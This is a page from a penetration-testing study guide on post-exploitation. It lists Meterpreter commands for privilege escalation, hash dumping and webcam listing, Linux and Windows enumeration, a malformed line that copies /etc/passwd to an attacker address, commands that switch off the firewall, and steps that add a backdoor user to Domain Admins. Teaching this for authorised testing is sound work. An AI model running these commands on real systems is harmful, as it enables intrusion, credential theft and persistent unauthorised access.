#PentesterPrep
- Home Lab Setup
- Passive Information Gathering
- Active Information Gathering
- Wireshark Fundamentals
- IPv6 Overview
- Vulnerability Identification & Analysis
- Common Services, Threats & Attacks
- Exploitation
- Post-Exploitation
- The Metasploit Framework
- Privilege Escalation Techniques
- Password Attacks
- Antivirus & Firewall Evasion
- Pivoting
- Wireless Testing
- Intro to Web Exploitation
- Buffer Overflows
- Capture the Flag (CTF)
Meterpreter
Meterpreter is an advanced payload that is part of the Metasploit Framework. It uses a reverse shell to create a connection back to the attacking machine. Meterpreter resides completely in the memory of a target machine and writes nothing to disk. It also does not spawn any new processes but rather injects itself into an existing process. It communicates over an encrypted channel and offers the attacker several useful pentesting features including a command shell, the ability to run executables, file send/receive, and network profiling.
Assuming you have a meterpreter shell on a windows host, you can use the following commands:
meterpreter > getsystem
meterpreter > getuid
meterpreter > run winenum
meterpreter > sysinfo
meterpreter > ipconfig
meterpreter > run get_local_subnet
meterpreter > enumdesktops
meterpreter > webcam_list
meterpreter > run post/windows/gather/smart_hashdump
meterpreter > run post/windows/gather/enum_applications
meterpreter > run post/windows/gather/enum_logged_on_users
meterpreter > run post/windows/gather/enum_shares
meterpreter > run post/windows/gather/checkvm
meterpreter > background
Upon exploitation of a Linux host, the screen may be blank but from here you can input your standard Linux post-exploitation commands.
# ifconfig
# whoami
# netstat -antp
# cat /etc/passwd >> root@10.0.1.21:/root
Firewalls
C:> netsh advfirewall show rule name=all
C:> netsh advfirewall set allprofile state off
C:> netsh advfirewall set allprofile state on
Domain Enumeration
The following commands, with the proper privileges, allow for Windows domain enumeration.
C:> net users
C:> net user /domain
C:> net user
C:> net users /domain
C:> net groups /domain
C:> net groups “Domain Admins” /domain
Adding a user to the Domain
Upon successfully enumerating the system/network and acquiring domain administrator privileges it is now time to add the user Cover6 with the password Cover6#C6S to the network/domain. The command to do this from a Windows host is:
C:> net user Cover6 Cover6#C6S /ADD /DOMAIN
Adding a user to the Domain Admins group
Upon successfully adding the user Cover6 to the domain, it is now time to add the user to the Domain Admins group. The command to do this from a Windows prompt is:
C:> net group “Domain Admins” Cover6 /ADD /DOMAIN